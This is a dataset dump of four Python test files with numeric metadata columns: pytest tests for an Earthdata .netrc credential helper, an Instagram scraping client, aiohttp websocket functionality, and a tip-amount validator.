| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1662cdc4663bee606f8b997df607434398e36a18
| 3,032
|
py
|
Python
|
tests/test_main.py
|
ACCESS-cloud-based-InSAR/DockerizedTopsApp
|
b96b50cebd188ed3ca99e07f8b4c3e3483b5f853
|
[
"Apache-2.0"
] | 2
|
2021-11-12T19:58:01.000Z
|
2021-12-07T00:12:03.000Z
|
tests/test_main.py
|
ACCESS-Cloud-Based-InSAR/DockerizedTopsApp
|
d7d7b7101fc747517d85b52de03ac2fc6e08be16
|
[
"Apache-2.0"
] | 27
|
2021-11-09T22:10:55.000Z
|
2022-03-21T10:32:36.000Z
|
tests/test_main.py
|
ACCESS-Cloud-Based-InSAR/DockerizedTopsApp
|
d7d7b7101fc747517d85b52de03ac2fc6e08be16
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from isce2_topsapp.__main__ import ensure_earthdata_credentials
def test_main_check_earthdata_credentials_prefer_netrc(tmp_path, monkeypatch):
monkeypatch.setenv('HOME', str(tmp_path))
netrc = tmp_path / '.netrc'
netrc.write_text('machine foobar.nasa.gov login foo password bar')
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
monkeypatch.setenv('EARTHDATA_USERNAME', 'fizz')
monkeypatch.setenv('EARTHDATA_PASSWORD', 'buzz')
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login foo password bar'
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, None)
with pytest.raises(ValueError):
ensure_earthdata_credentials('biz', 'baz')
netrc.write_text('machine urs.earthdata.nasa.gov login foo password bar')
ensure_earthdata_credentials(None, None)
assert netrc.read_text() == 'machine urs.earthdata.nasa.gov login foo password bar'
def test_main_check_earthdata_credentials_fn_variables(tmp_path, monkeypatch):
monkeypatch.setenv('HOME', str(tmp_path))
netrc = tmp_path / '.netrc'
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
with pytest.raises(ValueError):
ensure_earthdata_credentials('biz', None, host='foobar.nasa.gov')
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, 'baz', host='foobar.nasa.gov')
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login biz password baz'
netrc.unlink()
monkeypatch.setenv('EARTHDATA_USERNAME', 'fizz')
monkeypatch.setenv('EARTHDATA_PASSWORD', 'buzz')
ensure_earthdata_credentials('biz', 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login biz password baz'
def test_main_check_earthdata_credentials_env_variables(tmp_path, monkeypatch):
monkeypatch.setenv('HOME', str(tmp_path))
netrc = tmp_path / '.netrc'
monkeypatch.setenv('EARTHDATA_USERNAME', 'fizz')
with pytest.raises(ValueError):
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
monkeypatch.setenv('EARTHDATA_PASSWORD', 'buzz')
ensure_earthdata_credentials(None, None, host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login fizz password buzz'
netrc.unlink()
ensure_earthdata_credentials(None, 'baz', host='foobar.nasa.gov')
assert netrc.read_text() == 'machine foobar.nasa.gov login fizz password baz'
| 40.972973
| 87
| 0.737137
| 386
| 3,032
| 5.580311
| 0.121762
| 0.074745
| 0.126741
| 0.094708
| 0.940111
| 0.914113
| 0.863974
| 0.863974
| 0.837047
| 0.784123
| 0
| 0.000384
| 0.140831
| 3,032
| 73
| 88
| 41.534247
| 0.826488
| 0
| 0
| 0.764706
| 0
| 0
| 0.298153
| 0.014512
| 0
| 0
| 0
| 0
| 0.176471
| 1
| 0.058824
| false
| 0.27451
| 0.039216
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
169d5fcaa66ddb3b6a054a250d86808f9d4a8885
| 11,617
|
py
|
Python
|
tests/auth.py
|
joker2017/InstaParser
|
a08d1af841bd1701458be8ea0daedc7fbec94575
|
[
"MIT"
] | null | null | null |
tests/auth.py
|
joker2017/InstaParser
|
a08d1af841bd1701458be8ea0daedc7fbec94575
|
[
"MIT"
] | null | null | null |
tests/auth.py
|
joker2017/InstaParser
|
a08d1af841bd1701458be8ea0daedc7fbec94575
|
[
"MIT"
] | null | null | null |
import pytest
from random import randint, choice
from instaparser.agents import AgentAccount
from instaparser.entities import Account, Media, Location, Tag, Comment
from tests.settings import accounts, creds, locations, photos, photo_sets, tags, videos
def parametrize(*args):
result = []
for variable in zip(*args):
result.append((creds["login"], creds["password"], *variable))
return result
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_auth(login, password):
agent = AgentAccount(login, password)
Account.clear_cache()
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_update(login, password):
agent = AgentAccount(login, password)
agent.update()
assert(not getattr(agent, "id") is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_update_account(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
data = agent.update(account)
assert(not data is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_update_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
data = agent.update(photo)
assert(not photo.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_update_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
data = agent.update(photo_set)
assert(not photo_set.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_update_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
data = agent.update(video)
assert(video.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,id", parametrize(locations))
def test_update_location(login, password, id):
agent = AgentAccount(login, password)
location = Location(id)
data = agent.update(location)
Location.clear_cache()
@pytest.mark.parametrize("login,password,name", parametrize(tags))
def test_update_tag(login, password, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data = agent.update(tag)
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_media_account(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_media(account, count=count)
assert(min(account.media_count, count) == len(data))
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,id",
    parametrize([randint(100, 500) for _ in range(3)],
                [choice(locations) for _ in range(3)]))
def test_get_media_location(login, password, count, id):
    """get_media on a location honours `count` and reports end-of-data via pointer."""
    agent = AgentAccount(login, password)
    location = Location(id)
    media, pointer = agent.get_media(location, count=count)
    assert min(location.media_count, count) == len(media)
    assert (pointer is None) == (location.media_count <= count)
    Location.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,name",
    parametrize([randint(100, 500) for _ in range(3)],
                [choice(tags) for _ in range(3)]))
def test_get_media_tag(login, password, count, name):
    """get_media on a tag honours `count` and reports end-of-data via pointer."""
    agent = AgentAccount(login, password)
    tag = Tag(name)
    media, pointer = agent.get_media(tag, count=count)
    assert min(tag.media_count, count) == len(media)
    assert (pointer is None) == (tag.media_count <= count)
    Tag.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,shortcode",
    parametrize([randint(100, 500) for _ in range(3)],
                [choice(photos+photo_sets+videos)]))
def test_get_likes(login, password, count, shortcode):
    """get_likes honours `count` and reports end-of-data via pointer."""
    agent = AgentAccount(login, password)
    media = Media(shortcode)
    likes, pointer = agent.get_likes(media, count=count)
    assert min(media.likes_count, count) == len(likes)
    assert (pointer is None) == (media.likes_count <= count)
    Media.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,username",
    parametrize([randint(100, 500) for _ in range(3)],
                [choice(accounts) for _ in range(3)]))
def test_get_follows(login, password, count, username):
    """get_follows honours `count` and reports end-of-data via pointer."""
    agent = AgentAccount(login, password)
    account = Account(username)
    follows, pointer = agent.get_follows(account, count=count)
    assert min(account.follows_count, count) == len(follows)
    assert (pointer is None) == (account.follows_count <= count)
    Account.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,username",
    parametrize([randint(100, 500) for _ in range(3)],
                [choice(accounts) for _ in range(3)]))
def test_get_followers(login, password, count, username):
    """get_followers honours `count` and reports end-of-data via pointer."""
    agent = AgentAccount(login, password)
    account = Account(username)
    followers, pointer = agent.get_followers(account, count=count)
    assert min(account.followers_count, count) == len(followers)
    assert (pointer is None) == (account.followers_count <= count)
    Account.clear_cache()
@pytest.mark.parametrize("login,password,count",
                         parametrize([randint(100, 500) for _ in range(3)]))
def test_get_feed(login, password, count):
    """The feed must never return more items than requested."""
    agent = AgentAccount(login, password)
    feed_items, pointer = agent.feed(count=count)
    assert count >= len(feed_items)
    Account.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,username",
    parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_media_account_pointer(login, password, count, username):
    """Paging an account's media via pointer terminates exactly on exhaustion."""
    agent = AgentAccount(login, password)
    account = Account(username)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.get_media(account, pointer=pointer)
        collected.extend(page)
    assert (pointer is None) == (account.media_count <= count)
    Account.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,id",
    parametrize([randint(1, 10)], [choice(locations)]))
def test_get_media_location_pointer(login, password, count, id):
    """Paging a location's media via pointer terminates exactly on exhaustion."""
    agent = AgentAccount(login, password)
    location = Location(id)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.get_media(location, pointer=pointer)
        collected.extend(page)
    assert (pointer is None) == (location.media_count <= count)
    Account.clear_cache()
    Media.clear_cache()
    Location.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,name",
    parametrize([randint(1, 10)], [choice(tags)]))
def test_get_media_tag_pointer(login, password, count, name):
    """Paging a tag's media via pointer terminates exactly on exhaustion."""
    agent = AgentAccount(login, password)
    tag = Tag(name)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.get_media(tag, pointer=pointer)
        collected.extend(page)
    assert (pointer is None) == (tag.media_count <= count)
    Account.clear_cache()
    Media.clear_cache()
    Tag.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,shortcode",
    parametrize([randint(1, 10)], [choice(photos+photo_sets+videos)]))
def test_get_likes_pointer(login, password, count, shortcode):
    """Paging a media's likes via pointer terminates exactly on exhaustion."""
    agent = AgentAccount(login, password)
    media = Media(shortcode)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.get_likes(media, pointer=pointer)
        collected.extend(page)
    assert (pointer is None) == (media.likes_count <= count)
    Account.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,username",
    parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_follows_pointer(login, password, count, username):
    """Paging an account's follows via pointer terminates exactly on exhaustion."""
    agent = AgentAccount(login, password)
    account = Account(username)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.get_follows(account, pointer=pointer)
        collected.extend(page)
    assert (pointer is None) == (account.follows_count <= count)
    Account.clear_cache()
@pytest.mark.parametrize(
    "login,password,count,username",
    parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_followers_pointer(login, password, count, username):
    """Paging an account's followers via pointer terminates exactly on exhaustion."""
    agent = AgentAccount(login, password)
    account = Account(username)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.get_followers(account, pointer=pointer)
        collected.extend(page)
    assert (pointer is None) == (account.followers_count <= count)
    Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(1, 10)]))
def test_get_feed_pointer(login, password, count):
    """Paging the feed via pointer must run without raising."""
    agent = AgentAccount(login, password)
    pointer, collected = None, []
    for _ in range(count):
        page, pointer = agent.feed(pointer=pointer)
        collected.extend(page)
    Account.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_like_unlike_photo(login, password, shortcode):
    """Liking then unliking a photo must both succeed."""
    agent = AgentAccount(login, password)
    media = Media(shortcode)
    assert agent.like(media)
    assert agent.unlike(media)
    Account.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_like_unlike_photo_set(login, password, shortcode):
    """Liking then unliking a photo set must both succeed."""
    agent = AgentAccount(login, password)
    media = Media(shortcode)
    assert agent.like(media)
    assert agent.unlike(media)
    Account.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_like_unlike_video(login, password, shortcode):
    """Liking then unliking a video must both succeed."""
    agent = AgentAccount(login, password)
    media = Media(shortcode)
    assert agent.like(media)
    assert agent.unlike(media)
    Account.clear_cache()
    Media.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_follow_unfollow(login, password, username):
    """Following then unfollowing an account must both succeed."""
    agent = AgentAccount(login, password)
    target = Account(username)
    assert agent.follow(target)
    assert agent.unfollow(target)
    Account.clear_cache()
@pytest.mark.parametrize(
    "login,password,shortcode",
    parametrize([choice(photos), choice(photo_sets), choice(videos)]))
def test_comment(login, password, shortcode):
    """Adding a comment and deleting it again must run without raising."""
    agent = AgentAccount(login, password)
    media = Media(shortcode)
    comment = agent.add_comment(media, "test")
    agent.delete_comment(comment)
    Account.clear_cache()
    Media.clear_cache()
    Comment.clear_cache()
| 29.863753
| 100
| 0.662994
| 1,357
| 11,617
| 5.559322
| 0.058954
| 0.139581
| 0.066808
| 0.093054
| 0.848091
| 0.807927
| 0.768558
| 0.754109
| 0.719247
| 0.633749
| 0
| 0.008175
| 0.210295
| 11,617
| 388
| 101
| 29.940722
| 0.814149
| 0
| 0
| 0.639535
| 0
| 0
| 0.059654
| 0.046828
| 0
| 0
| 0
| 0
| 0.124031
| 1
| 0.108527
| false
| 0.317829
| 0.01938
| 0
| 0.131783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
16cd4efcde768d9949800ada0aa7712cf0286a23
| 12,020
|
py
|
Python
|
tests/test_client_ws_functional.py
|
Martiusweb/aiohttp
|
718313b89d6a5b1ecdc48cdd908aabdbac53a1cf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client_ws_functional.py
|
Martiusweb/aiohttp
|
718313b89d6a5b1ecdc48cdd908aabdbac53a1cf
|
[
"Apache-2.0"
] | null | null | null |
tests/test_client_ws_functional.py
|
Martiusweb/aiohttp
|
718313b89d6a5b1ecdc48cdd908aabdbac53a1cf
|
[
"Apache-2.0"
] | 1
|
2019-11-24T23:12:51.000Z
|
2019-11-24T23:12:51.000Z
|
import asyncio
import pytest
import aiohttp
from aiohttp import hdrs, helpers, web
@asyncio.coroutine
def test_send_recv_text(loop, test_client):
    """Round-trip a TEXT frame: the server echoes the payload with a suffix."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        question = yield from ws.receive_str()
        ws.send_str(question+'/answer')
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_str('ask')
    answer = yield from conn.receive_str()
    assert answer == 'ask/answer'
    yield from conn.close()
@asyncio.coroutine
def test_send_recv_bytes_bad_type(loop, test_client):
    """receive_bytes() must raise TypeError when the peer sends a TEXT frame."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        question = yield from ws.receive_str()
        ws.send_str(question+'/answer')
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_str('ask')
    with pytest.raises(TypeError):
        yield from conn.receive_bytes()
    yield from conn.close()
@asyncio.coroutine
def test_send_recv_bytes(loop, test_client):
    """Round-trip a BINARY frame: the server echoes the payload with a suffix."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        question = yield from ws.receive_bytes()
        ws.send_bytes(question+b'/answer')
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_bytes(b'ask')
    answer = yield from conn.receive_bytes()
    assert answer == b'ask/answer'
    yield from conn.close()
@asyncio.coroutine
def test_send_recv_text_bad_type(loop, test_client):
    """receive_str() must raise TypeError when the peer sends a BINARY frame."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        question = yield from ws.receive_bytes()
        ws.send_bytes(question+b'/answer')
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_bytes(b'ask')
    with pytest.raises(TypeError):
        yield from conn.receive_str()
    yield from conn.close()
@asyncio.coroutine
def test_send_recv_json(loop, test_client):
    """JSON helpers round-trip a dict payload through the socket."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        incoming = yield from ws.receive_json()
        ws.send_json({'response': incoming['request']})
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    payload = {'request': 'test'}
    conn.send_json(payload)
    reply = yield from conn.receive_json()
    assert reply['response'] == payload['request']
    yield from conn.close()
@asyncio.coroutine
def test_ping_pong(loop, test_client):
    """With autoping on, ping/pong is transparent and data frames still arrive."""
    closed = helpers.create_future(loop)

    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        question = yield from ws.receive_bytes()
        ws.ping()
        ws.send_bytes(question+b'/answer')
        try:
            yield from ws.close()
        finally:
            # signal the test body that the server side finished
            closed.set_result(1)
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.ping()
    conn.send_bytes(b'ask')

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.BINARY
    assert msg.data == b'ask/answer'

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.CLOSE

    yield from conn.close()
    yield from closed
@asyncio.coroutine
def test_ping_pong_manual(loop, test_client):
    """With autoping disabled, PONG and PING frames surface to the caller."""
    closed = helpers.create_future(loop)

    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        question = yield from ws.receive_bytes()
        ws.ping()
        ws.send_bytes(question+b'/answer')
        try:
            yield from ws.close()
        finally:
            closed.set_result(1)
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/', autoping=False)
    conn.ping()
    conn.send_bytes(b'ask')

    # our own ping is answered first...
    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.PONG
    # ...then the server's ping arrives and must be answered manually
    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.PING
    conn.pong()

    msg = yield from conn.receive()
    assert msg.data == b'ask/answer'
    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.CLOSE
    yield from closed
@asyncio.coroutine
def test_close(loop, test_client):
    """Client-initiated close reports code 1000 and a CLOSED state afterwards."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        yield from ws.receive_bytes()
        ws.send_str('test')
        yield from ws.receive()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_bytes(b'ask')

    did_close = yield from conn.close()
    assert did_close
    assert conn.closed
    assert conn.close_code == 1000

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.CLOSED
@asyncio.coroutine
def test_close_from_server(loop, test_client):
    """A server-initiated close delivers CLOSE, then CLOSED, to the client."""
    closed = helpers.create_future(loop)

    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        try:
            yield from ws.receive_bytes()
            yield from ws.close()
        finally:
            closed.set_result(1)
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_bytes(b'ask')

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.CLOSE
    assert conn.closed

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.CLOSED
    yield from closed
@asyncio.coroutine
def test_close_manual(loop, test_client):
    """With autoclose disabled, the CLOSE frame surfaces and close() is explicit."""
    closed = helpers.create_future(loop)

    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        yield from ws.receive_bytes()
        ws.send_str('test')
        try:
            yield from ws.close()
        finally:
            closed.set_result(1)
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/', autoclose=False)
    conn.send_bytes(b'ask')

    msg = yield from conn.receive()
    assert msg.data == 'test'

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.CLOSE
    assert msg.data == 1000
    assert msg.extra == ''
    # not closed yet: autoclose is off, so we must close explicitly
    assert not conn.closed

    yield from conn.close()
    yield from closed
    assert conn.closed
@asyncio.coroutine
def test_close_timeout(loop, test_client):
    """close() gives up after the configured timeout when the server stalls."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        yield from ws.receive_bytes()
        ws.send_str('test')
        # never answer the close handshake
        yield from asyncio.sleep(10, loop=loop)

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/', timeout=0.2, autoclose=False)
    conn.send_bytes(b'ask')

    msg = yield from conn.receive()
    assert msg.data == 'test'
    assert msg.type == aiohttp.WSMsgType.TEXT

    msg = yield from conn.close()
    assert conn.closed
    assert isinstance(conn.exception(), asyncio.TimeoutError)
@asyncio.coroutine
def test_close_cancel(loop, test_client):
    """Cancelling an in-flight close() still leaves the socket closed cleanly."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        yield from ws.receive_bytes()
        ws.send_str('test')
        yield from asyncio.sleep(10, loop=loop)

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/', autoclose=False)
    conn.send_bytes(b'ask')

    first = yield from conn.receive()
    assert first.data == 'test'

    close_task = loop.create_task(conn.close())
    yield from asyncio.sleep(0.1, loop=loop)
    close_task.cancel()
    yield from asyncio.sleep(0.1, loop=loop)

    assert conn.closed
    assert conn.exception() is None
@asyncio.coroutine
def test_override_default_headers(loop, test_client):
    """Caller-supplied headers must override the default handshake headers."""
    @asyncio.coroutine
    def handler(request):
        # the overridden websocket version must reach the server
        assert request.headers[hdrs.SEC_WEBSOCKET_VERSION] == '8'
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        ws.send_str('answer')
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect(
        '/', headers={hdrs.SEC_WEBSOCKET_VERSION: '8'})
    msg = yield from conn.receive()
    assert msg.data == 'answer'
    yield from conn.close()
@asyncio.coroutine
def test_additional_headers(loop, test_client):
    """Extra caller headers are forwarded along with the handshake request."""
    @asyncio.coroutine
    def handler(request):
        assert request.headers['x-hdr'] == 'xtra'
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        ws.send_str('answer')
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/', headers={'x-hdr': 'xtra'})
    msg = yield from conn.receive()
    assert msg.data == 'answer'
    yield from conn.close()
@asyncio.coroutine
def test_recv_protocol_error(loop, test_client):
    """Malformed frames from the server produce an ERROR message with details."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        yield from ws.receive_str()
        # bypass the framing layer and write garbage bytes on purpose
        ws._writer.writer.write(b'01234' * 100)
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_str('ask')

    msg = yield from conn.receive()
    assert msg.type == aiohttp.WSMsgType.ERROR
    assert type(msg.data) is aiohttp.WebSocketError
    assert msg.data.args[0] == 'Received frame with non-zero reserved bits'
    assert msg.extra is None
    yield from conn.close()
@asyncio.coroutine
def test_recv_timeout(loop, test_client):
    """receive() wrapped in aiohttp.Timeout raises when the server is slow."""
    @asyncio.coroutine
    def handler(request):
        ws = web.WebSocketResponse()
        yield from ws.prepare(request)
        yield from ws.receive_str()
        # stall longer than the client-side timeout below
        yield from asyncio.sleep(0.1, loop=request.app.loop)
        yield from ws.close()
        return ws

    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', handler)
    client = yield from test_client(app)
    conn = yield from client.ws_connect('/')
    conn.send_str('ask')

    with pytest.raises(asyncio.TimeoutError):
        with aiohttp.Timeout(0.01, loop=app.loop):
            yield from conn.receive()
    yield from conn.close()
| 25.466102
| 75
| 0.645341
| 1,562
| 12,020
| 4.857875
| 0.069782
| 0.14233
| 0.063785
| 0.057986
| 0.891671
| 0.85767
| 0.833553
| 0.819979
| 0.786505
| 0.770295
| 0
| 0.004148
| 0.237854
| 12,020
| 471
| 76
| 25.52017
| 0.824146
| 0
| 0
| 0.805797
| 0
| 0
| 0.030033
| 0
| 0
| 0
| 0
| 0
| 0.110145
| 1
| 0.092754
| false
| 0
| 0.011594
| 0
| 0.144928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16da25251bf979a10758e5dadd116d7d7491b726
| 656
|
py
|
Python
|
tests/TestUtils.py
|
magayorker/magatip
|
1aef0b5d3228ed35f1547cb184a5c3a9bd7c5b76
|
[
"MIT"
] | 49
|
2017-05-10T09:48:05.000Z
|
2022-03-19T20:30:32.000Z
|
tests/TestUtils.py
|
hockleyj/sodogetip
|
37d6880f3dbe2bb46a29bfa67d93763b91c7a6e7
|
[
"MIT"
] | 57
|
2017-05-10T02:56:22.000Z
|
2021-10-06T11:44:22.000Z
|
tests/TestUtils.py
|
hockleyj/sodogetip
|
37d6880f3dbe2bb46a29bfa67d93763b91c7a6e7
|
[
"MIT"
] | 25
|
2017-05-09T21:29:29.000Z
|
2022-02-06T03:57:17.000Z
|
import unittest
import utils
class TestUtils(unittest.TestCase):
    """Unit tests for the tip-amount validation helper in `utils`."""

    def test_check_amount_valid(self):
        """Whole amounts >= 1 (int or str) are valid; fractions and negatives are not."""
        valid = [1, 10, "1", "10"]
        invalid = [0.1, -1, "0.1", "-1"]
        for amount in valid:
            self.assertEqual(True, utils.check_amount_valid(amount))
        for amount in invalid:
            self.assertEqual(False, utils.check_amount_valid(amount))


# Allow running this file directly: python TestUtils.py
if __name__ == '__main__':
    unittest.main()
| 32.8
| 64
| 0.71189
| 85
| 656
| 5.176471
| 0.247059
| 0.225
| 0.327273
| 0.381818
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0.763636
| 0
| 0.021818
| 0.161585
| 656
| 19
| 65
| 34.526316
| 0.778182
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
